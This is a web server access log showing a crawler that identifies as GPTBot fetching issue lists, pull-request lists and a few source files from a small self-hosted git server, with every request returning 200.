[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=closed&type=all" +[17/Feb/2026:18:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:18:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:18:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +[17/Feb/2026:18:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" +[17/Feb/2026:18:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123698] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 123729] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21823] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" +[17/Feb/2026:18:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:18:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9976] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&state=open&type=all" +[17/Feb/2026:18:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&state=open&type=all" +[17/Feb/2026:18:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=open&type=all" +[17/Feb/2026:18:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10000] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=open&type=all" +[17/Feb/2026:18:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:18:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9948] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:18:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/dist" [Client 74.7.227.38] [Length 10186] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:18:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:18:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 